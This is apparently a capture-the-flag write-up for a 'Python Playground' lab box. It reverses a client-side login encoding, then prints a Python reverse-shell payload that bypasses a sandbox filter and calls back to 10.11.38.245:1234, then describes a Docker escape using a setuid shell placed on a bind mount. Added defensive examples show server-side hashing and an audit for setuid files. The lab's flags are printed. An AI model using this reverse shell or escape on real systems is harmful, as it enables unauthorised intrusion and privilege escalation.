Port scanning

sudo nmap --min-rate 10000 -p- 10.10.144.20 
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:55 CST
Nmap scan report for 10.10.144.20
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.144.20 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:56 CST
Nmap scan report for 10.10.144.20
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f4:af:2f:f0:42:8a:b5:66:61:3e:73:d8:0d:2e:1c:7f (RSA)
| 256 36:f0:f3:aa:6b:e3:b9:21:c8:88:bd:8d:1c:aa:e2:cd (ECDSA)
|_ 256 54:7e:3f:a9:17:da:63:f2:a2:ee:5c:60:7d:29:12:55 (ED25519)
80/tcp open http Node.js Express framework
|_http-title: Python Playground!
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

Directory brute-forcing turns up admin.html, which is an admin login page. When I tried to capture the login request in a proxy, nothing was captured, which means the check is done client-side in JavaScript, so I looked at the page source. It gives away the whole verification scheme: the username is connor, and there are two functions, one that converts text to an array and one that converts an array back to a string, using their own little algorithm. Time to write a Python script to reverse it (it has been ages since I hand-wrote a script QAQ).

# Encoded value taken from the page source of admin.html
hash = 'dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu'


def textToarray(hash):
    # Each lowercase letter becomes its 0-based alphabet index ('a' -> 0)
    array = []
    for c in hash:
        code = ord(c)
        array.append(code - 97)
    return array


def arrayTostring(array):
    # Every pair of indices is read as a two-digit base-26 number and turned
    # back into one character
    string = ''
    for i in range(0, len(array), 2):
        string += chr(array[i] * 26 + array[i + 1])
    return string


if __name__ == '__main__':
    # The page applies the transform twice, so undo it twice
    print(arrayTostring(textToarray(arrayTostring(textToarray(hash)))))

The output is: spaghetti1245

Login successful!!!
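As an added example (not part of the original writeup), here is a reconstruction of the page's two-function transform together with its inverse, and a server-side salted-hash check for contrast. The function names, the PBKDF2 parameters and the sample salt are my own choices; the encoded string is the one found in the page source. The point it makes is that the client-side "hash" is a reversible encoding: anyone with the page source can run it backwards, whereas a stored PBKDF2 digest cannot be turned back into the password, and the comparison has to happen on the server.

```python
import hashlib
import hmac
import os
from typing import Optional

# Added example: reconstruction of the page's client-side transform and its
# inverse, plus a server-side check for contrast. Names are my own; the
# encoded string below is the one found in the page source.
PAGE_BLOB = "dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"
ALPHA_BASE = ord("a")
RADIX = 26           # two lowercase letters form one two-digit base-26 number
PBKDF2_ROUNDS = 200_000


def text_to_array(text):
    """Map each lowercase letter to its 0-based alphabet index ('a' -> 0)."""
    return [ord(c) - ALPHA_BASE for c in text]


def array_to_string(array):
    """Join index pairs as base-26 digits into one character code each."""
    if len(array) % 2:
        raise ValueError("array length must be even")
    return "".join(chr(array[i] * RADIX + array[i + 1])
                   for i in range(0, len(array), 2))


def decode_once(blob):
    return array_to_string(text_to_array(blob))


def encode_once(plain):
    """Inverse of decode_once: split each character code into two base-26 digits."""
    out = []
    for ch in plain:
        hi, lo = divmod(ord(ch), RADIX)
        if hi >= RADIX:
            raise ValueError(f"{ch!r} does not fit in two base-26 digits")
        out.append(chr(ALPHA_BASE + hi))
        out.append(chr(ALPHA_BASE + lo))
    return "".join(out)


def decode(blob, rounds=2):
    """The page applied the transform twice, so undo it twice by default."""
    for _ in range(rounds):
        blob = decode_once(blob)
    return blob


def encode(plain, rounds=2):
    for _ in range(rounds):
        plain = encode_once(plain)
    return plain


def hash_password(password, salt: Optional[bytes] = None):
    """Salted PBKDF2-HMAC-SHA256: the stored value cannot be run backwards."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password, salt, digest):
    """Constant-time comparison against the stored digest."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    recovered = decode(PAGE_BLOB)
    print("client-side blob decodes to:", recovered)
    print("re-encoding gives the blob back:", encode(recovered) == PAGE_BLOB)
    salt, digest = hash_password(recovered)
    print("server-side verify (right / wrong password):",
          verify_password(recovered, salt, digest),
          verify_password("spaghetti0000", salt, digest))
```

Running the block decodes the page's string, re-encodes the result to show the transform is a bijection on this input, and then shows the server-side alternative: the stored digest is useless to a reader of the source, and the wrong password fails verification.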

Getshell

The playground lets you run Python scripts, but it filters some calls, for example os.system.

The filter can still be bypassed; start a listener first.

socket = __import__("socket")
subprocess = __import__("subprocess")
os = __import__("os")

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.38.245",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call("/bin/bash")

Got a shell!

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm-color

We are root??? Looking at the room's tags, we must be inside a Docker container.

flag1

THM{7e0b5cf043975e3c104a458a8d4f6f2f}

The room hints that we need to find some credentials. Our nmap scan showed port 22 open, so maybe the credentials obtained above also work for SSH. I should have thought of that sooner.

Sure enough, flag2:

THM{69a36d6f9da10d23ca0dbfdf6e691ec5}

Privilege escalation (Docker escape)

Now we have a root shell inside Docker and a user shell on the host; how do we get a root shell on the host? This reminded me of a box I did earlier: perhaps we first need to find the container's mount point. In the Docker shell, create a hackme.txt in the /mnt/log directory.

On the host:

find / -name hackme.txt 2>/dev/null

Found the mount point: /var/log/hackme.txt

Inside Docker (if you use bash instead, it complains about missing shared libraries):

cp /bin/sh /mnt/log
chmod +s /mnt/log/sh

On the host:

./sh -p

Privilege escalation successful.
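As an added example (my own, not part of the writeup), here is the host-side check that would have caught this escape: the chain only works because a directory that root inside the container can write to is bind-mounted from the host, and the host then honours a setuid bit on a file dropped there. Auditing the host side of every bind mount for setuid/setgid files, and mounting such directories with nosuid on the host, closes that path. The script assumes POSIX find and chmod; the sample directory it builds stands in for /var/log and is constructed on the fly.

```bash
#!/bin/sh
# Added example: audit the host side of a container bind mount for
# setuid/setgid files. Function names and the demo directory are my own.

# Print every regular file under $1 carrying the setuid or setgid bit,
# one path per line, without crossing into other filesystems.
audit_setuid_dir() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Same search, but as a long listing so owner and mode are visible.
report_setuid_dir() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
}

# Number of offending files, as a bare integer (handy for alerting).
count_setuid_dir() {
    audit_setuid_dir "$1" | wc -l | tr -d ' '
}

# Demonstration on a constructed directory that plays the role of /var/log:
# one harmless file, one setuid file of the kind the writeup plants.
demo() {
    tmp=$(mktemp -d)
    printf 'ordinary log line\n' > "$tmp/hackme.txt"
    printf '#!/bin/sh\n' > "$tmp/sh"
    chmod u+s "$tmp/sh"
    echo "setuid/setgid files under $tmp: $(count_setuid_dir "$tmp")"
    report_setuid_dir "$tmp"
    rm -rf "$tmp"
}

demo
```

On a real host, run audit_setuid_dir against each path that appears as a bind source in `docker inspect` output; a non-zero count on a directory that should only hold data is the signal. The longer-term fix is to keep such mounts on a filesystem mounted with nosuid and to avoid giving a container a writable host directory at all when it runs as root.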

flag3

THM{be3adc69c25ad14eb79da4eb57925ad1}

Closing thoughts

A really fun box: the web part needs a little bit of reversing, and as for the Docker escape, the whole idea is basically to find the mount point.